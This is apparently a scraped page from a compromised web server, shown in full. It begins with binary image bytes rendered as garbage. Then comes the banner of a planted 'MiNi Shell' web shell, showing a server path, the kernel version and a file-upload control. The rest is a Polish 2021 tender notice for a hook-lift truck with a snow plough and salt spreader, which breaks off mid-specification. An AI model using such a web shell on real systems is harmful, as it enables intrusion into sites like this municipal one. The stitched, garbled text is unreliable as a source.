JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210525/0006433102-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00064331 z dnia 2021-05-25</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa ciężarowego pojazdu hakowego wraz ze skrzynią ładunkową, posypywarką, pługiem i innym wyposażeniem dodatkowym” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Zakład Usług Komunalnych Spółka z ograniczoną odpowiedzialnością</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 368467945</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bema 12A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Oświęcim</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL21A - Oświęcimski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">www.mzuk@zuk.oswiecim.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mzuk.oswiecim.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa ciężarowego pojazdu hakowego wraz ze skrzynią ładunkową, posypywarką, pługiem i innym wyposażeniem dodatkowym” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7208c4fa-bd2c-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00064331</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.mzuk.oswiecim.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postepowanie prowadzone jest<br/>w formie elektronicznej za pośrednictwem miniPortalu, adres strony<br/>internetowej:https://www.miniportal.uzp.pl/. W postępowaniu o udzielenie zamówienia komunikacja<br/>między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod<br/>adresem:https://www.miniportal.uzp.gov.pl/, poczty elektronicznej mzuk@zuk.oswiecim.pl, oraz ePUAPu,<br/>dostępnego pod adresem: https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy:<br/>złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji. Wymagania<br/>techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych<br/>kopiidokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w<br/>Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy<br/>usług administracji publicznej (ePUAP).Wykonawca przystępując do niniejszego postępowania<br/>oudzielenie zamówienia publicznego, akceptuje warunki korzystania z miniPortalu, określone w<br/>Regulaminie miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień<br/>tego regulaminu. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych<br/>formularzy do: złożenia i wycofania oferty oraz do komunikacji wynosi 150 MB. Za datę<br/>przekazaniaoferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji, przekazywanych w<br/>postępowaniu, przyjmuje się datę ich przekazania na ePUAP. Zamawiający podał w informacjach<br/>ogólnych niniejszej SWZ ID postępowania. Dane postępowanie można wyszukać również na Liście<br/>wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony<br/>głównej z zakładki Postępowania na miniPortalu.Sposób sporządzenia dokumentów elektronicznych<br/>musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020 r. w sprawie sposobusporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz<br/>rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).Sposób komunikowania się Zamawiającego z Wykonawcami (z wyłączeniem oferty i załączników do oferty): za pomocą poczty elektronicznej<br/>Zamawiającego wskazany powyżej w informacjach ogólnych oraz pocztyelektronicznej Wykonawcy<br/>wskazanej w formularzu oferty. Sposób sporządzania i przekazywania informacji określają<br/>rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. (Dz.U. z 2020 r., poz. 2452) w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznychdla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie oraz rozporządzenie Ministra Rozwoju, pracy i technologii z<br/>dnia 23 grudnia 2020 r. (Dz.U. z 2020 r., poz. 2415) w sprawie podmiotowych środków<br/>dowodowychoraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od<br/>wykonawcy. Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia<br/>oraz informacje za pośrednictwem środków komunikacji elektronicznej, każda ze stron na żądanie<br/>drugiej strony niezwłocznie potwierdza fakt ich otrzymania. Zamawiający sugeruje, aby<br/>korespondencja dotycząca niniejszego postępowania o udzielenie zamówienia publicznego oznaczone<br/>były nazwą oraz znakiem postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający, zgodnie z art.13 oraz art. 14 Rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27.04.2016 w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE, Dziennik Urzędowy UE, L 119/1 z 4.05.2016, informuje,<br/>że: Administratorem Państwa danych osobowych (dalej: „Administrator") jest MZUK Sp. z<br/>o.o., ul. Bema 12A, 32-600 Oświęcim, biuro@mzuk.oswiecim.pl, tel.: 33/476-80-63 Administrator<br/>wyznaczył Inspektora Ochrony Danych nadzorującego prawidłowość przetwarzania danych<br/>osobowych, z którym można skontaktować się za pośrednictwem adresu e-mail: biuro@mzuk.oswiecim.pl.<br/>Państwa dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie<br/>zamówienia publicznego prowadzonego w trybie przetargu nieograniczonego oraz w przypadku wyboru<br/>Pana oferty w celu realizacji warunków zawieranych umów; wykonania ciążących na Administratorze<br/>danych obowiązków prawnych; dochodzenia ewentualnych roszczeń z tytułu niewykonania lub<br/>nienależytego wykonania zawartej umowy. Podstawą prawną ich przetwarzania są: art. 6 ust.1 lit.b<br/>ogólnego rozp o ochronie danych osobowych (przetwarzanie jest niezbędne do wykonania umowy,<br/>której stroną jest osoba, której dane dotyczą, lub do podjęcia działań na żądanie osoby, której dane<br/>dotyczą, przed zawarciem umowy), art. 6 ust. 1 lit. c (przetwarzanie jest niezbędne do wypełnienia<br/>obowiązku prawnego ciążącego na administratorze) oraz ustawy z dnia 11 września 2019 r. Prawo<br/>zamówień publicznych, dalej „ustawa Pzp”. Dane osobowe pozyskane w związku z postępowaniem o<br/>udzielenie zamówienia i będą przetwarzane przez Zamawiającego wyłącznie w celu złożenia w/w<br/>oferty cenowej, w tym ewentualnego wykonania umowy, realizacji obowiązków i praw (w tym roszczeń)<br/>wiążących się z zawartą umową oraz w celu realizacji obowiązków wynikających z przepisów<br/>prawa.Obowiązek podania osobowych jest wymogiem ustawowym określonym w przepisach uPZP,<br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych mogą uniemożliwić wzięcie udziału w postępowaniu.Posiadacie<br/>Państwo: prawo dostępu do swoich danych oraz otrzymania ich kopii; prawo do sprostowania<br/>(poprawiania) swoich danych;prawo do usunięcia danych osobowych, w sytuacji, gdy przetwarzanie<br/>danych nie następuje w celu wywiązania się z obowiązku wynikającego z przepisu prawa lub w ramach<br/>sprawowania władzy publicznej; prawo do ograniczenia przetwarzania danych, przy czym przepisy<br/>odrębne mogą wyłączyć możliwość skorzystania z tego praw; prawo do wniesienia skargi do Prezesa<br/>Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy.Dane nie będą<br/>przetwarzane w sposób zautomatyzowany w tym również profilowane.Zamawiający przypomina<br/>o ciążącym na Wykonawcy dopełnieniu obowiązków informacyjnych wynikających z art.13 i art.14<br/>RODO<br/>względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z<br/>prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od Wykonawcy biorącego<br/>udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w<br/>art. 14 ust. 5 RODO. Pozostałe kwestie wskazane są w rozdziale 1.4 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MZUK/01/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa samochodu ciężarowego wraz z hakiem oraz z kontenerem KP18 siatkowym, posypywarką, pługiem i innym osprzętem dodatkowym.<br/>2.	Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 1.7 do swz.<br/>I.	Wymagania dla podwozia:<br/>1)	Podwozie musi pochodzić z produkcji seryjnej, nie dopuszcza się dostawy prototypów lub pierwszych urządzeń z danej serii,<br/>2)	Rok produkcji: 2021,<br/>3)	Konfiguracja osi 4x2,<br/>4)	Rozstaw osi min. 3950 mm,<br/>5)	Typ zawieszenia (przód /tył) – Mechaniczne/Pneumatyczne,<br/>6)	DMC min. 18t,<br/>7)	Szerokość pojazdu nie więcej niż 2600mm,<br/>8)	Silnik o mocy max. nie mniejszej niż 280KM przy pojemności skokowej silnika nie mniejszej niż 9litrów, spełniający wymagania normy Euro 6, w szczególności w zakresie zużycia energii oraz dla emisji CO2, tlenku azotu, węglowodorów i cząstek stałych,<br/>9)	Wylot rury wydechowej skierowany do tyłu,<br/>10)	Zbiornik AdBlue (euro 6) o pojemności min. 47 dm3,<br/>11)	Blokada mechanizmu różnicowego,<br/>12)	Automatyczna lub zautomatyzowana skrzynia biegów,<br/>13)	Regulowana kolumna kierownicy w dwóch płaszczyznach,<br/>14)	Klimatyzacja,<br/>15)	Przekładnia automatyczna lub automatyczny system zmiany biegów do przekładni manualnych,<br/>16)	Układ ESP, APS, system zapobiegający się staczaniu pojazdu, systemy bezpieczeństwa biernego zgodnie z obowiązującymi przepisami prawa,<br/>17)	Hamulce tarczowe,<br/>18)	Zbiornik paliwa aluminiowy lub stalowy o minimalnej pojemności 200 litrów, podgrzewacz paliwa,<br/>19)	Filtr oleju w tylnym moście,<br/>20)	Akumulatory min. 180Ah,<br/>21)	Alternator min. 100A,<br/>22)	Kolor kabiny biały,<br/>23)	Kabina krótka lub średnia, wewnętrzne ściany kabiny pokryte materiałem łatwo zmywalnym, okno w ścianie tylnej kabiny umożliwiające kierowcy obserwację pracy haka,<br/>24)	Fotel kierowcy regulowany, tapicerka fotela kierowcy z materiału łatwego do utrzymania w czystości, pokrowce na siedzenia kierowcy i pasażera tkanina + winyl lub winyl (+1 dodatkowy komplet)<br/>25)	Dźwiękowy sygnał ostrzegawczy biegu wstecznego<br/>26)	Przystawka odbioru mocy od silnika do zasilania układu hydraulicznego zabudowy<br/>27)	Zawieszenie tylne pneumatyczne o nośności min. 11,5t<br/>28)	Zawieszenie przednie resory paraboliczne o nośności min. 8ton,<br/>29)	Lusterka wsteczne lewe i prawe elektrycznie sterowane i podgrzewane,<br/>30)	Lusterko przednie dojazdowe podgrzewane,<br/>31)	Reflektory H7 wyposażone w zintegrowane światła do jazdy dziennej typu LED,<br/>32)	Lampy robocze za kabiną, na tylnym zwisie,<br/>33)	Opony dla osi przedniej 315/80 R22.5,<br/>34)	Opony dla osi tylnej napędowej 315/80 R22.5,<br/>35)	Tylna belka antynajazdowa o profilu okrągłym spełniająca dyrektywę 2006/20/EC,<br/>36)	Tachograf cyfrowy (instrukcja w języku polskim),<br/>37)	Immobilizer,<br/>38)	Komputer pokładowy, komunikaty wyświetlane w języku polskim,<br/>39)	Centralny zamek zdalnie sterowany, <br/>40)	Światła ostrzegawcze (koguty oraz belka) na kabinie pojazdu – belka świetlna z LOGO MZUK Oświęcim, Zamawiający dopuszcza się zastosowanie wyłącznie belki świetlnej w kolorze pomarańczowym z światłem ostrzegawczym z logo MZUK Oświęcim.<br/>41)	Dywaniki gumowe w kabinie,<br/>42)	Dodatkowe miejsce na zamontowanie radiostacji z wyprowadzoną instalacją 12V,<br/>43)	Podłączenie lub wskazanie możliwości podłączenia bez utraty uprawnień gwarancyjnych modułu GPS, czujnika rozładunku oraz sondy paliwa, dostarczonych przez firmę Globtrak Sp. z o.o.<br/>44)	Oklejenie boczne na drzwiach pojazdu lub innym elemencie zabudowy Logiem oraz adresem MZUK Oświęcim.<br/>45)	Okres gwarancji: minimum 24 miesiące.<br/><br/>II.	Wymagania dla nadwozia – urządzenie hakowe:<br/>1)	Nadwozie musi pochodzić z produkcji seryjnej, nie dopuszcza się dostawy prototypów lub pierwszych urządzeń z danej serii,<br/>2)	Rok produkcji 2021<br/>3)	Urządzenie hakowe do załadunku kontenerów o długości min. 3500 mm do 4500 mm, w standardzie DIN 30722 oraz typu ”KP” o poj. 5-10 m3<br/>4)	Udźwig techniczny min 10 000 kg, <br/>5)	Regulowana wysokość zaczepu haka z obowiązkową wysokością 1200 mm lub hak stały 1200 mm,<br/>6)	Sterowanie z kabiny pneumatyczne,<br/>7)	Rozdzielacz hydrauliczny sterowany pneumatycznie<br/>8)	Główne rolki prowadzące i/lub ślizgi prowadzące posiadają zabezpieczenia uniemożliwiające przemieszczanie się kontenera na boki podczas jego przesuwu,<br/>9)	Hydrauliczna blokada kontenera z elektronicznym czujnikiem położenia blokady przesyłającym dane do panelu sterowniczego lub urządzenia zdalnego oraz zabezpieczenie uniemożliwiające wykonywanie przypadkowych ruchów urządzenia hakowego, informacja świetlna na panelu sterowniczym w kabinie i/lub urządzeniu zdalnym wskazująca minimum stan zabezpieczeń/blokad, położenie kontenera lub ram nośnych urządzenia hakowego (pozycja robocza/pozycja transportowa). Zamawiający dopuszcza urządzanie jedynie z czujnikiem blokady w postaci mikro wyłącznika lub czujnika zbliżeniowego z kontrolką w kabinie informującą operatora o otwarciu blokady.<br/>10)	Ramię haka przesuwne (hydrauliczny siłownik przesuwu), min. 900 mm.<br/>11)	Przesuw poziomy kontenera bez konieczności stosowania dodatkowych rolek poza 2-oma rolkami „prowadzącymi” zamocowanymi z tyłu ramy nośnej.<br/>Zamawiający dopuszcza urządzenie hakowe z rolkami na podłużnicach zmniejszającymi tarcie kontenera podczas załadunku.<br/>12)	Punkt wykreślony 01.06.2021r.<br/>13)	Punkt wykreślony 01.06.2021r.<br/>14) Funkcja awaryjnego sterowania urządzeniem hakowym bezpośrednio na bloku zaworowym, <br/>15)	Powierzchnia ślizgów/rolek prowadzących nie wyższa niż 250 mm od ramy głównej pojazdu,<br/>16)	Pompa hydrauliczna<br/>17)	Oświetlenie pola pracy podczas załadunku,<br/>18)	Osłony tylnych lamp zespolonych<br/>19)	Zabudowa musi odpowiadać dyrektywie maszynowej 2006/42/WE, wytycznym 89/392/EWG i posiadać znak CE, jak również spełniać wymogi określone w Rozporządzeniu Ministra Gospodarki w sprawie zasadniczych wymagań dla maszyn (Dz.U. z 2008r. nr199,poz.1228) wraz ze zmianami obowiązującymi na dzień składania oferty)<br/>20)Okres gwarancji: minimum 24 miesiące. <br/><br/>III.	Pług odśnieżny:<br/>1)szerokość 3,0-3,2m,<br/>2)szerokość odśnieżania 2,6-2,8m,<br/>3)2 lemiesze gumowy i stalowy z możliwością zmiany w trakcie jazdy,<br/>4)centrala hydrauliczna,<br/>5)sterowanie z kabiny,<br/>6)reflektory drogowe,<br/>7)światła obrysowe,<br/>8)podnóża magazynowe<br/>9)Okres gwarancji:minimum 36miesięcy. <br/>IV.Posypywarka z układem solankowym:<br/>1.Pojemność zbiornika posypywarki-6m3<br/>2.Konstrukcja blach i profili: konstrukcja i zasobnik na materiały uszorstniające wykonany ze stali ST3 śrutowanej i zabezpieczonej antykorozyjnie,<br/> 3.Posypywarka zasilana z układu hydraulicznego pojazdu poprzez podłączenie przewodu zasilającego i powrotnego.<br/>4.Wyposażenie w podajnik taśmowy o szerokości min. 500mm <br/>5.Konstrukcja przystosowana do montażu na nośniku hakowym <br/>6.Przeznaczona do posypywania różnymi środkami uszorstniającymi ze szczególnym uwzględnieniem soli oraz mieszanek solno-piaskowych<br/>7.Sterowanie poprzez elektroniczny pulpit sterujący umieszczony w kabinie samochodu ciężarowego, umożliwiający pełne sterowanie z kabiny do prędkości pojazdu podłączenie pod tachograf:<br/>włączanie / wyłączanie układów hydraulicznych<br/>zmianę szerokości sypania w zakresie 3-10m<br/>regulację ilości rozsypywanego materiału<br/>regulację kierunku rozsypywania (asymetria), siłownik w obudowie z tworzywa sztucznego, odporny na działanie trudnych warunków zewnętrznych<br/>załączanie sygnalizacji ostrzegawczej i reflektora pracy nocnej<br/>sypanie do prędkości pojazdu, czujnik sypania, m.in. solanki<br/>wybór materiału.<br/>12.	Talerz rozsypujący regulowany oraz łopatki ze stali nierdzewnej, łopatki wymienne rozłączne (śruby) Regulacja wysokości talerza rozsypującego.<br/>13.	Wyposażenie w barierkę ochronną, podnoszoną wraz z opuszczeniem drabinki<br/>14.	Diodowy reflektor roboczy oraz diodowa lampa ostrzegawcza w kolorze pomarańczowym<br/>15.	Krata nasypowa dwudzielna spełniająca funkcję zabezpieczające przed przedostawaniem się materiału o nadmiernych gabarytach oraz zapewniająca pełne bezpieczeństwo operatora. Prześwit oczek wynosi max 50mm<br/>16.	Pokrowiec ochronny (zamocowany na specjalnych stelażach) wykonany z wysokogatunkowego polietylenu zabezpieczający materiał rozsypywany przed działaniem czynników zewnętrznych z możliwością szybkiego i łatwego zakrywania i odkrywania bez konieczności wchodzenia na urządzenie<br/>17.	Posypywarka z układem solankowym umieszczony z przodu zbiornik solanki o pojemności min.1800l.<br/>18.	Okres gwarancji: minimum 12miesięcy. <br/>V.Kontener dla pojazdu hakowego DMC18t (kontener siatkowy)<br/>1)Zaczep haka fi36 na wysokości 1200mm.<br/>2)Rozstaw zewnętrzny płóz 1020mm.<br/>3)Wymiary wewnętrzne: 4000x2300x200mm<br/>4)Boki do wysokości 500mm oraz tylne drzwi i przód kontenera z blachy stalowej 2mm.<br/>5)Boki od 500do2000mm wysokości siatka 50x50x5mm.<br/>6)W prawej, bocznej ścianie drzwi w tylnej części (powyżej500mm)<br/>7)Płozy UPN160 lub UPE180.<br/>8)Dodatkowe wzmocnienia w podłodze pomiędzy wręgami.<br/>9)Wszystkie elementy ruchome (tulejki) oraz rolki wyposażone są w smarowniczki.<br/>10)Rolki o średnicy 159mm i szerokości 300mm.<br/>11)Haczyki do siatki/plandeki po całym obwodzie kontenera.<br/>12)Schodki i podesty na przedniej ścianie ułatwiające zakładanie siatki/plandeki.<br/>13)Plandeka rolowana na dłuższym 